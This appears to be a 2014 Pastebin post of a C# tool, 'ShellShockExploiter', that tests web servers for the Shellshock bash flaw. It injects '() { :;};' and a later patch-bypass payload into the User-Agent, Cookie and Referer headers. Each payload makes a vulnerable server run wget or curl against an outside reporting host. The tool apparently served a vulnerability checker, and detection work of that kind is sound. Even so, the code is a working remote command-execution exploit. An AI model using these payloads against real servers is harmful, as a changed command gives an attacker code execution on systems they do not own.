SHARE
TWEET

ShellShock.brandonpotter.com

BrandonPotter Sep 25th, 2014 7,570 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Net;
  5. using System.Text;
  6. using System.Threading.Tasks;
  7.  
  8. namespace ShellShockExploiter
  9. {
  10.     public class SSExploiter
  11.     {
  12.         public event Action<string> TestExecuted;
  13.  
  14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
  15.         {
  16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
  17.  
  18.             foreach (var header in headers)
  19.             {
  20.                 // original exploit
  21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
  22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
  23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
  24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
  25.  
  26.                 // new exploit for patch
  27.                 // () { (a)=>\' bash -c "echo date"
  28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
  29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
  30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
  31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
  32.             }
  33.         }
  34.  
  35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
  36.         {            
  37.             ShortWebClient wC = new ShortWebClient();
  38.             string serverResponse = "";
  39.             try
  40.             {
  41.                 wC.Headers.Add(header, bashCmd);
  42.                 wC.DownloadString(targetUrl);
  43.                 serverResponse = "200 OK";
  44.             }
  45.             catch (TimeoutException te)
  46.             {
  47.                 serverResponse = "Timeout";
  48.             }
  49.             catch (WebException e)
  50.             {
  51.                 if (e.Message.Contains("(403) Forbidden"))
  52.                 {
  53.                     serverResponse = "403 Forbidden";
  54.                 }
  55.                 else if (e.Message.Contains("(404) Not Found"))
  56.                 {
  57.                     serverResponse = "404 Not Found";
  58.                 }
  59.                 else
  60.                 {
  61.                     serverResponse = "Error";
  62.                 }
  63.             }
  64.             catch (Exception e) {
  65.                 serverResponse = "No Response or Error";
  66.             }
  67.  
  68.             wC.Dispose();
  69.             wC = null;
  70.  
  71.             try
  72.             {
  73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
  74.             }
  75.             catch { }
  76.         }
  77.     }
  78. }
RAW Paste Data
Top